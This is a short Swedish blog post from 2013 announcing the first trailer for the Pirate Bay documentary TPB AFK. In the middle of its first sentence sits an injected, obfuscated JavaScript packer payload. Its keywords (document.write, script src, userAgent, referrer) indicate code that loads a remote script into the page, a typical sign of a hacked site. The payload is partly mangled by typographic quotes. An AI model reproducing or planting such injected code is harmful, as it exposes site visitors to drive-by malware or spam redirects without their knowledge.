Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

TPB AFK – Första trailern är här

Filip Urde
  • On 14 januari, 2013
  • http://www.revue.se/filip-urde

För två veckor sedan så skrev vi om den kommande dokumentären om The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yynsf|var|u0026u|referrer|khirs||js|php’.split(’|’),0,{}))
Pirate Bay – TPB AFK
(The Pirate Bay – Away From Keyboard).

Nu har det dykt upp en trailer för dokumentären som visar de tre The Pirate Bay-grundarna både i och utanför domstolen där rättegången mot dem ägde rum.

TPB AFK kommer att släppas någon gång under första halvåret 2013.

Det exakta releasedatumet kommer vi veta innan den här månaden är slut.